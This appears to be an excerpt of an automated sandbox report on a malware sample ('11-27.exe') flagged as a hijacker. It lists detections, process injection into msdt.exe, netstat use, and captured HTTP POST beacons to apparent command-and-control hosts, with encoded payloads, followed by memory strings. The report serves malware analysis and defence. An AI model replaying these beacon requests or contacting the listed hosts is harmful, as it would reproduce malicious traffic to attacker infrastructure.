Source: Yara match	File source: 00000002.00000002.416656811.00000000032A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.416715788.00000000032D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.419388564.00000000051EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.433805167.0000000003260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.604691451.00000000002E0000.00000004.00000001.sdmp, type: MEMORY

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: 11-27.exe

Joe Sandbox ML: detected

Source: 5.2.Hmptdrv.exe.2e50000.4.unpack	Avira: Label: TR/Hijacker.Gen
Source: 2.2.Hmptdrv.exe.3230000.5.unpack	Avira: Label: TR/Hijacker.Gen
Source: 0.2.11-27.exe.2e80000.5.unpack	Avira: Label: TR/Hijacker.Gen

Source: C:\Users\user\Desktop\11-27.exe	Code function: 4x nop then mov eax, dword ptr [00460BCCh]	0_3_02B2896C
Source: C:\Users\user\Desktop\11-27.exe	Code function: 4x nop then mov eax, ecx	0_3_02B28C98
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	Code function: 4x nop then mov eax, dword ptr [00460BCCh]	5_3_02AF896C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	Code function: 4x nop then mov eax, ecx	5_3_02AF8C98
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 4x nop then pop edi	6_2_02AA6CB7
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 4x nop then pop edi	6_2_02AA7D8D
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 4x nop then pop edi	7_2_00467D8D

Networking:

Uses netstat to query active network connections and open ports

Show sources

Source: unknown

Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE

Source: global traffic

HTTP traffic detected: GET /gwg/?1bj=jlNDBdXxM&pPU=lb/SWHpKCmsmK+u5QR6+71VT1RCMiNBNQ95QwlYjM9FeW5Wl/GojsaK+wOwJlCTaA7k0MtpWEA== HTTP/1.1Host: www.systemmigrationservices.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 162.159.136.232 162.159.136.232
Source: Joe Sandbox View	IP Address: 162.159.130.233 162.159.130.233

Source: Joe Sandbox View

ASN Name: SINGLEHOP-LLCUS SINGLEHOP-LLCUS

Source: Joe Sandbox View

JA3 fingerprint: ce5f3254611a8c095a3d821d44539877

Source: global traffic	HTTP traffic detected: POST /gwg/ HTTP/1.1Host: www.horne-construction.comConnection: closeContent-Length: 413Cache-Control: no-cacheOrigin: http://www.horne-construction.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.horne-construction.com/gwg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 70 50 55 3d 68 72 67 59 4d 66 52 41 31 76 28 4b 4e 52 38 4b 52 42 4b 44 33 54 79 6e 39 71 58 72 76 56 7e 53 43 6f 42 2d 55 4c 46 75 6b 4a 38 54 52 68 35 5f 56 34 58 52 35 6f 4a 6c 45 35 39 64 52 67 77 66 45 49 7a 36 74 66 4c 74 4d 41 41 51 7a 68 58 4e 48 78 36 4b 34 45 64 44 64 32 4e 74 73 5f 46 45 55 46 44 34 68 4a 55 7a 5a 6b 70 74 4b 58 74 4b 71 73 68 51 53 64 77 61 77 66 36 6f 6f 78 30 34 6c 67 31 78 53 34 35 76 79 35 61 4c 68 38 51 52 44 41 45 33 42 41 43 45 49 4f 62 36 37 69 33 46 4a 59 6d 44 41 2d 46 61 6b 4f 30 7a 73 44 66 46 30 6a 49 46 41 42 6a 52 69 43 39 79 45 43 47 6b 45 45 36 4b 42 63 6b 48 52 4e 44 6b 79 71 34 5a 6d 77 66 45 79 4f 71 63 77 6d 6d 64 43 4a 33 50 76 48 62 5a 63 64 68 38 6e 61 76 7a 78 6e 6c 43 6b 6b 6b 55 65 72 68 6e 6d 77 56 69 67 6e 4b 39 66 37 37 2d 58 42 57 43 7a 68 28 7a 46 62 78 77 43 6b 6c 31 67 54 78 45 6a 4c 6b 6b 61 74 43 61 75 38 57 46 33 46 35 4f 62 62 49 6e 71 37 30 70 28 36 52 4e 62 79 58 30 65 72 64 44 6b 67 54 72 58 47 33 6a 37 74 77 5a 73 48 74 6f 79 36 6c 6f 67 6e 7a 4e 39 32 62 32 4f 55 54 49 39 67 74 44 6a 46 77 76 4c 76 54 43 59 56 4d 66 50 51 32 66 78 6d 70 57 35 6c 61 4f 57 52 33 56 66 6a 49 7a 36 4d 53 38 77 6d 39 78 64 37 6e 42 33 32 59 75 48 79 6d 51 74 37 55 2e 00 00 00 00 00 00 00 00 Data Ascii: pPU=hrgYMfRA1v(KNR8KRBKD3Tyn9qXrvV~SCoB-ULFukJ8TRh5_V4XR5oJlE59dRgwfEIz6tfLtMAAQzhXNHx6K4EdDd2Nts_FEUFD4hJUzZkptKXtKqshQSdwawf6oox04lg1xS45vy5aLh8QRDAE3BACEIOb67i3FJYmDA-FakO0zsDfF0jIFABjRiC9yECGkEE6KBckHRNDkyq4ZmwfEyOqcwmmdCJ3PvHbZcdh8navzxnlCkkkUerhnmwVignK9f77-XBWCzh(zFbxwCkl1gTxEjLkkatCau8WF3F5ObbInq70p(6RNbyX0erdDkgTrXG3j7twZsHtoy6lognzN92b2OUTI9gtDjFwvLvTCYVMfPQ2fxmpW5laOWR3VfjIz6MS8wm9xd7nB32YuHymQt7U.
Source: global traffic	HTTP traffic detected: POST /gwg/ HTTP/1.1Host: www.horne-construction.comConnection: closeContent-Length: 150725Cache-Control: no-cacheOrigin: http://www.horne-construction.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.horne-construction.com/gwg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 70 50 55 3d 68 72 67 59 4d 62 4d 7a 79 66 37 66 4a 6a 59 4a 44 79 79 4c 7a 51 36 35 35 72 33 34 6d 6c 57 67 42 5f 51 37 55 4b 30 47 70 74 34 65 57 41 70 5f 54 39 37 57 77 6f 4a 6d 55 4a 39 53 41 51 4d 4e 65 66 33 49 74 65 4f 6c 4d 41 49 54 6c 58 54 4d 48 68 36 6e 37 6b 41 77 66 33 74 71 73 39 77 6b 46 6a 36 2d 6b 4a 6f 7a 63 51 4e 38 45 53 42 52 74 70 5a 50 51 70 70 51 32 65 53 4c 6f 43 41 4d 69 7a 49 6b 52 35 31 68 6c 65 6e 48 6b 38 68 34 48 54 6b 30 65 67 6d 44 4c 4a 4c 70 28 44 72 42 4b 63 53 4c 46 5f 46 5a 37 75 73 31 72 42 48 6a 69 69 38 53 47 52 54 46 69 46 42 49 65 6c 71 35 56 57 4f 43 45 74 5a 69 4a 73 33 6d 7e 39 55 52 69 7a 33 32 77 50 61 7a 79 6e 32 43 52 6f 66 61 6a 6b 69 53 66 38 6f 43 67 76 66 33 36 32 55 33 6c 58 49 4d 42 34 4a 49 68 7a 45 34 71 58 71 6c 63 35 33 4d 59 42 57 68 31 68 28 5f 4c 37 42 49 48 58 4a 75 72 69 41 6b 71 71 74 6a 41 70 79 5a 70 2d 65 46 7a 67 56 4c 65 71 38 56 6b 76 35 55 76 4c 46 4b 62 6c 6e 58 66 72 63 5a 76 45 72 6b 58 47 32 59 37 70 6b 7a 76 57 35 6f 7a 76 6f 30 68 41 66 42 37 32 62 72 43 6b 44 57 7a 77 52 54 6a 46 34 76 4c 66 6a 6f 5a 6e 73 66 45 53 7e 51 78 48 70 57 30 31 61 4f 64 78 32 4e 52 6a 42 59 35 64 6a 6b 33 6a 39 73 45 72 54 6f 77 45 78 43 63 42 7e 58 7a 4c 34 33 30 6c 42 46 69 69 47 41 42 65 39 48 62 4d 32 74 39 76 4d 51 6a 4d 59 79 73 66 41 59 47 45 41 56 54 7a 4b 56 77 58 73 55 51 69 65 4d 44 55 4c 68 78 63 47 53 41 6e 62 33 53 75 46 34 7a 5a 34 51 69 53 74 71 7a 6e 53 4d 69 37 48 55 6c 4b 63 4d 70 41 38 64 4a 59 68 5f 43 53 45 77 6e 37 53 6c 39 62 57 61 33 5f 78 33 75 39 33 61 6a 6f 31 33 7e 79 65 2d 78 64 4c 4c 6d 59 30 4f 53 64 42 68 50 50 74 51 64 69 30 58 73 4d 6c 57 69 66 5a 58 4a 48 68 33 42 64 6d 36 62 58 45 5a 78 74 4f 41 7a 37 32 31 76 39 63 5f 61 43 39 79 68 4a 69 45 4d 73 53 43 75 50 65 6d 41 69 74 75 4a 75 6e 52 28 68 68 67 67 7a 37 69 76 31 63 52 42 66 28 61 37 32 77 6d 32 5f 78 56 6c 6a 35 34 57 4e 50 50 78 75 63 69 42 6c 75 6a 43 6e 46 37 64 61 4e 77 7a 66 71 70 71 5a 6c 79 35 52 4c 72 70 6c 64 57 4e 41 36 63 54 75 52 71 74 4d 53 47 37 6d 6c 48 35 72 53 41 6e 55 5a 4d 4e 30 5a 44 64 6f 55 53 5a 6c 7a 69 7a 44 47 68 6e 39 63 47 30 59 63 32 45 30 36 50 53 5a 41 38 4c 79 49 61 68 47 4c 78 4d 4c 4e 44 32 69 7e 53 69 49 6a 46 79 41 30 55 56 31 71 79 6d 67 4b 62 6b 6d 32 76 56 42 75 65 68 32 55 33 71 34 46 70 66 42 64 77 70 7a 6c 75 5a 58 75 35 69 58 78 33 76 68 51 37 43 70 6d 71 6a 31 47 79 49 6b 56 4c 49 33 33 4e 59 76 57 59 63 49 36 72 56 38 45 6d 5a 46 33 64 73 6b 76 4e 55 50 4f 51 44 37 56 5a 74 66 6b 67 44 51 6e 61 6f 73 44 64 30 50 33 79 68 51 7e 42 7
Source: global traffic	HTTP traffic detected: POST /gwg/ HTTP/1.1Host: www.systemmigrationservices.comConnection: closeContent-Length: 413Cache-Control: no-cacheOrigin: http://www.systemmigrationservices.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.systemmigrationservices.com/gwg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 70 50 55 3d 74 35 7a 6f 49 6e 4e 5f 65 33 34 6f 59 70 62 4b 4e 30 50 37 37 43 68 33 77 6a 7e 71 70 4e 55 47 55 49 63 54 70 33 30 46 63 59 49 5a 45 36 37 68 7a 6b 41 37 6d 61 44 6e 72 50 67 58 30 78 6a 65 48 37 6c 76 4a 65 56 34 46 66 7e 4c 33 54 78 41 57 33 33 56 51 62 28 46 4f 59 74 58 44 32 32 55 57 6f 72 78 4a 6e 68 75 53 67 4a 4f 74 41 4d 7a 70 49 6a 35 58 54 36 4f 6e 57 72 37 30 76 55 4c 4f 63 52 64 4d 45 32 78 4c 4c 7e 61 38 66 33 4d 77 4a 57 41 79 47 7a 61 6a 42 36 55 62 76 67 6c 56 36 5a 56 76 72 4b 47 48 6f 41 6d 4d 38 6d 45 55 52 6c 5f 51 57 43 32 53 78 31 39 47 55 7a 6d 6c 55 79 76 78 4c 57 47 59 65 51 4b 52 76 36 73 32 48 4b 76 73 79 58 52 71 49 47 65 43 7a 36 65 70 39 32 4b 61 4e 38 46 70 71 62 35 77 49 32 37 72 75 49 49 42 67 55 76 39 52 75 6d 7e 48 79 36 28 64 43 42 78 6d 39 30 76 48 4a 53 50 69 61 58 79 36 51 71 43 4d 4e 5f 28 43 62 52 7a 55 33 54 64 53 75 4c 45 46 31 39 69 72 59 4e 28 6c 6b 4c 6a 6e 6f 6b 28 68 73 79 44 4e 69 56 49 73 49 35 6d 78 4a 56 4f 32 75 4e 48 6b 4f 65 54 2d 79 71 6d 66 6c 57 79 54 62 45 79 58 35 4e 6c 6d 67 32 55 78 44 34 4d 52 51 37 4c 5a 53 48 55 4a 6f 48 71 44 65 6c 46 33 72 7a 77 63 69 6b 4c 61 56 6e 7e 73 4b 4f 56 50 68 30 39 74 66 34 49 61 42 42 59 5f 36 74 44 5a 63 2e 00 00 00 00 00 00 00 00 Data Ascii: pPU=t5zoInN_e34oYpbKN0P77Ch3wj~qpNUGUIcTp30FcYIZE67hzkA7maDnrPgX0xjeH7lvJeV4Ff~L3TxAW33VQb(FOYtXD22UWorxJnhuSgJOtAMzpIj5XT6OnWr70vULOcRdME2xLL~a8f3MwJWAyGzajB6UbvglV6ZVvrKGHoAmM8mEURl_QWC2Sx19GUzmlUyvxLWGYeQKRv6s2HKvsyXRqIGeCz6ep92KaN8Fpqb5wI27ruIIBgUv9Rum~Hy6(dCBxm90vHJSPiaXy6QqCMN_(CbRzU3TdSuLEF19irYN(lkLjnok(hsyDNiVIsI5mxJVO2uNHkOeT-yqmflWyTbEyX5Nlmg2UxD4MRQ7LZSHUJoHqDelF3rzwcikLaVn~sKOVPh09tf4IaBBY_6tDZc.
Source: global traffic	HTTP traffic detected: POST /gwg/ HTTP/1.1Host: www.systemmigrationservices.comConnection: closeContent-Length: 150725Cache-Control: no-cacheOrigin: http://www.systemmigrationservices.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.systemmigrationservices.com/gwg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 70 50 55 3d 74 35 7a 6f 49 69 78 72 59 58 38 31 66 63 72 4c 4d 6b 66 6a 73 79 51 70 79 55 75 35 67 5f 46 33 4b 72 5a 59 70 32 45 4a 46 4d 46 65 58 71 4c 68 31 6e 6f 32 6f 61 44 6b 74 50 67 55 6c 68 76 49 5a 63 67 69 4a 66 68 65 46 66 6d 49 73 68 70 46 53 33 33 43 52 36 44 39 66 6f 52 41 44 30 7a 38 59 71 6d 69 44 48 74 75 63 32 68 4d 69 46 51 73 68 70 28 36 4e 44 6d 50 30 58 44 2d 30 38 52 2d 4f 2d 74 46 50 46 36 6b 42 64 4f 52 7a 5f 48 6b 36 36 47 46 74 43 62 5a 73 67 69 48 47 63 45 68 5a 62 59 31 7a 2d 7e 46 5a 6f 59 67 47 62 44 78 53 67 68 57 53 46 61 49 53 32 42 74 59 46 50 7a 32 43 32 33 32 5f 47 5f 54 4b 67 45 66 2d 36 6b 79 42 65 53 71 79 6e 75 31 37 53 37 49 44 58 63 39 5a 47 61 48 38 55 58 75 62 6e 31 6f 70 47 50 72 35 51 41 65 51 6c 4e 78 79 65 39 6e 45 71 69 38 66 75 33 31 32 38 53 70 48 4a 4f 48 41 79 6a 28 76 41 68 4a 38 63 76 67 78 37 50 35 6e 44 6f 4e 41 6d 4c 4a 42 70 70 6b 61 4d 37 31 30 55 6a 7a 57 39 71 7e 7a 78 53 52 64 69 55 62 2d 67 69 6d 78 4a 33 4f 79 37 51 47 52 6d 65 54 76 53 48 69 38 4e 43 7e 44 61 42 78 48 70 4c 7e 46 30 6d 55 78 4c 34 4e 6b 55 52 61 36 79 48 44 76 55 49 71 6e 4b 6c 43 48 72 7a 72 4d 6a 78 45 49 67 71 79 74 62 4f 64 4e 70 6c 73 66 66 47 50 71 4d 64 66 4e 32 6d 55 74 67 68 62 4e 39 76 37 58 78 77 77 38 7e 67 72 6e 49 4c 68 59 37 71 31 4d 32 73 42 66 6b 6e 42 4b 68 52 4a 64 62 31 59 6f 4e 6c 43 4a 75 33 74 53 52 71 42 36 74 6f 72 79 41 65 6b 43 42 7a 68 37 7e 4a 59 63 4c 68 45 78 34 73 51 42 5a 49 6d 71 6c 34 63 4d 4b 34 63 4b 6b 41 48 37 65 32 50 75 41 43 58 4b 67 34 76 33 7a 56 69 47 57 44 33 2d 62 36 44 64 38 79 59 65 7e 30 52 4f 37 63 70 53 46 62 43 46 55 50 68 39 52 78 4d 58 52 7a 4e 53 5a 75 54 41 6d 59 53 45 6c 62 4c 31 6e 55 63 75 41 4b 71 65 31 42 4b 56 74 50 4c 6e 79 78 6e 5a 32 54 58 74 4a 4b 72 46 6a 34 62 4d 51 73 43 77 61 67 43 35 37 4a 45 74 6b 33 46 49 70 48 58 32 34 37 72 36 78 39 58 69 4c 43 6c 73 73 6e 44 38 7e 69 31 49 7e 6c 47 75 50 6c 65 39 42 7a 41 59 39 64 51 32 32 47 61 30 67 5f 4a 63 77 73 31 36 44 6e 66 56 5a 6f 32 49 71 48 68 4b 6d 67 45 42 45 65 56 61 6a 30 4c 35 6a 64 71 6f 51 66 54 73 6d 34 52 57 72 78 70 44 6b 33 77 61 4b 65 4e 58 4a 34 54 54 28 33 68 5f 48 50 6a 7a 72 67 68 4e 6a 74 50 4b 38 59 72 46 73 4c 6e 64 71 79 63 71 45 72 33 30 59 75 71 59 44 5f 7e 56 50 4e 4a 35 42 4c 53 5a 74 2d 61 49 68 31 42 39 32 63 47 6a 71 4c 31 6e 35 63 61 57 74 76 63 4c 59 55 55 74 7e 59 41 33 41 68 7a 61 4b 47 37 55 35 35 31 31 56 66 45 37 4e 75 30 64 37 53 46 48 55 4e 31 38 30 38 59 53 6d 6c 4e 65 4a 65 61 63 44 72 30 64 73 47 6d 41 37 50 38 5f 78 6

Source: global traffic

Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)

Source: unknown

DNS traffic detected: queries for: discord.com

Source: unknown

HTTP traffic detected: POST /gwg/ HTTP/1.1Host: www.horne-construction.comConnection: closeContent-Length: 413Cache-Control: no-cacheOrigin: http://www.horne-construction.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.horne-construction.com/gwg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 70 50 55 3d 68 72 67 59 4d 66 52 41 31 76 28 4b 4e 52 38 4b 52 42 4b 44 33 54 79 6e 39 71 58 72 76 56 7e 53 43 6f 42 2d 55 4c 46 75 6b 4a 38 54 52 68 35 5f 56 34 58 52 35 6f 4a 6c 45 35 39 64 52 67 77 66 45 49 7a 36 74 66 4c 74 4d 41 41 51 7a 68 58 4e 48 78 36 4b 34 45 64 44 64 32 4e 74 73 5f 46 45 55 46 44 34 68 4a 55 7a 5a 6b 70 74 4b 58 74 4b 71 73 68 51 53 64 77 61 77 66 36 6f 6f 78 30 34 6c 67 31 78 53 34 35 76 79 35 61 4c 68 38 51 52 44 41 45 33 42 41 43 45 49 4f 62 36 37 69 33 46 4a 59 6d 44 41 2d 46 61 6b 4f 30 7a 73 44 66 46 30 6a 49 46 41 42 6a 52 69 43 39 79 45 43 47 6b 45 45 36 4b 42 63 6b 48 52 4e 44 6b 79 71 34 5a 6d 77 66 45 79 4f 71 63 77 6d 6d 64 43 4a 33 50 76 48 62 5a 63 64 68 38 6e 61 76 7a 78 6e 6c 43 6b 6b 6b 55 65 72 68 6e 6d 77 56 69 67 6e 4b 39 66 37 37 2d 58 42 57 43 7a 68 28 7a 46 62 78 77 43 6b 6c 31 67 54 78 45 6a 4c 6b 6b 61 74 43 61 75 38 57 46 33 46 35 4f 62 62 49 6e 71 37 30 70 28 36 52 4e 62 79 58 30 65 72 64 44 6b 67 54 72 58 47 33 6a 37 74 77 5a 73 48 74 6f 79 36 6c 6f 67 6e 7a 4e 39 32 62 32 4f 55 54 49 39 67 74 44 6a 46 77 76 4c 76 54 43 59 56 4d 66 50 51 32 66 78 6d 70 57 35 6c 61 4f 57 52 33 56 66 6a 49 7a 36 4d 53 38 77 6d 39 78 64 37 6e 42 33 32 59 75 48 79 6d 51 74 37 55 2e 00 00 00 00 00 00 00 00 Data Ascii: pPU=hrgYMfRA1v(KNR8KRBKD3Tyn9qXrvV~SCoB-ULFukJ8TRh5_V4XR5oJlE59dRgwfEIz6tfLtMAAQzhXNHx6K4EdDd2Nts_FEUFD4hJUzZkptKXtKqshQSdwawf6oox04lg1xS45vy5aLh8QRDAE3BACEIOb67i3FJYmDA-FakO0zsDfF0jIFABjRiC9yECGkEE6KBckHRNDkyq4ZmwfEyOqcwmmdCJ3PvHbZcdh8navzxnlCkkkUerhnmwVignK9f77-XBWCzh(zFbxwCkl1gTxEjLkkatCau8WF3F5ObbInq70p(6RNbyX0erdDkgTrXG3j7twZsHtoy6lognzN92b2OUTI9gtDjFwvLvTCYVMfPQ2fxmpW5laOWR3VfjIz6MS8wm9xd7nB32YuHymQt7U.

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Type: text/html; charset=UTF-8Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://horne-construction.com/wp-json/>; rel="https://api.w.org/"Transfer-Encoding: chunkedContent-Encoding: gzipVary: Accept-EncodingDate: Sat, 28 Nov 2020 09:25:59 GMTServer: LiteSpeedData Raw: 66 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dc 3b d9 72 db 38 b6 cf f1 57 c0 4c c5 96 a6 49 48 96 d7 c8 96 7b 32 ee 74 dd 5b d5 9d 4c 65 79 4a 5c 2a 88 3c a2 d0 01 01 36 00 6a 29 c7 ff 7e 0b e0 4e 51 8b dd c9 cb cd 8b 45 e0 ac c0 d9 c9 dc 1c 06 c2 d7 ab 18 d0 4c 47 ec f6 e0 c6 fc 41 8c f0 70 e4 00 f7 3e 7f 74 cc 1a 90 e0 f6 e0 c5 4d 04 9a 20 7f 46 a4 02 3d 72 3e 7f fa dd bb 72 8a 75 4e 22 18 39 73 0a 8b 58 48 ed 20 5f 70 0d 5c 8f 9c 05 0d f4 6c 14 c0 9c fa e0 d9 07 17 51 4e 35 25 cc 53 3e 61 30 3a b1 54 18 e5 df 90 04 36 72 62 29 a6 94 81 83 66 12 a6 23 67 a6 75 ac 86 bd 5e 18 c5 21 16 32 ec 2d a7 bc 77 62 90 0e 5e dc 68 aa 19 dc fe 97 84 80 b8 d0 68 2a 12 1e a0 a3 97 57 83 93 93 6b f4 3f ef 3f bc 7b 8b ee de bf fb f8 e9 c3 e7 bb 4f ff fb fe dd 4d 2f 45 38 b8 29 d8 1d 07 5c 79 b1 84 29 68 7f 76 9c f2 3c ee f5 66 42 72 f0 7c c1 95 96 89 af a9 e0 d8 17 d1 31 ea dd ee c6 9d 0a ae 15 0e 85 08 19 90 98 aa fd 31 15 5e 18 15 1b 6c 1c c2 34 48 4e 34 38 c8 5c d6 c8 21 71 cc a8 4f 8c 58 3d a9 d4 2f cb 88 39 c8 aa 36 72 d6 b5 46 47 92 fc 9d 88 6b f4 3b 40 50 3d d6 e1 26 3d 7b 53 80 a0 e7 d4 b5 fd 61 62 dc 89 28 02 ae d5 13 e4 f1 33 94 8a 60 2f 5e dc 28 5f d2 58 67 67 a2 61 a9 7b 7f 91 39 49 57 8d 51 bd 78 b1 a0 3c 10 0b 3c 5e c4 10 89 bf e8 47 d0 9a f2 50 a1 11 7a 70 26 44 c1 67 c9 9c 61 66 62 5f 7b 5f 7b d9 05 7c ed d1 88 84 a0 be f6 7c 21 e1 6b cf 22 7f ed 9d 0c 70 1f f7 bd 93 af bd cb c1 f2 72 f0 b5 e7 b8 0e 2c b5 33 74 70 cc 43 c7 75 d4 3c 7c 2e 45 35 0f 2d 3d 35 0f df a6 24 d5 dc 92 14 89 f4 c1 19 3e 38 be e0 3e d1 56 94 4c e6 a1 11 b9 dd 52 bf f6 16 b1 47 b9 cf 92 c0 a8 f1 97 b2 0b 16 d9 93 c0 80 28 c0 11 e5 f8 2f f5 eb 1c e4 e8 1c 9f e1 33 e7 f1 f1 da 1c 5a ef 5f 87 e8 d3 8c 2a 64 dc 10 51 85 48 a2 85 17 02 07 49 34 04 e8 5f 3d 03 75 38 4d b8 75 8c 0e b8 c4 d5 dd 87 39 91 48 ba dc 15 2e 75 e3 11 c1 be 04 a2 e1 2d 03 73 d9 1d c7 27 7c 4e 94 d3 75 d5 28 c6 21 e8 3b 13 21 96 fa e8 a8 fa d4 71 06 81 d3 bd ce 49 23 bf 03 39 69 32 fa a8 25 e5 21 9e 4a 11 dd cd 88 bc 13 01 5c 2b ec 33 20 f2 03 f8 ba d3 77 fb 6e 8c d3 18 13 e3 19 d0 70 a6 bb ae c2 53 ca d8 27 58 ea 0e c1 c6 71 56 1d 3d a3 ca 85 ae db 77 fb dd 6b 2b f6 28 c6 5a fc 46 34 f9 fc e1 8f 4e f7 5a 82 4e 24 47 cf 27 ae 53 e2 ae 1c 8d ea a4 1f 0b d5 58 07 ba 0f 74 da 39 54 df bf 1f 96 42 76 53 de 87 27 d7 6a 41 b5 3f eb 28 6c 8e e9 3f 44 01 a3 1c 46 8e 16 b1 63 94 12 26 ba 5e f4 fb e8 74 10 2f d1 1b 49 09 73 5c e8 3e f8 44 81 33 65 24 74 86 19 29 bf f3 e5 64 70 f9 fa ea d2 bd 38 ef 9f be 76 af 06 fd 73 f7 f5 d5 eb f3 f4 f9 de 5d db 3e ad 6e 77 8f 8e 3a 87 7e e7 cb f9 f9 e9 f9 85 7b 7e 71 35 b8 70 8b df 27 af ef dd da

Source: explorer.exe, 00000001.00000000.370844122.0000000007890000.00000002.00000001.sdmp	String found in binary or memory: http://%s.com
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000001.00000000.370844122.0000000007890000.00000002.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.es/
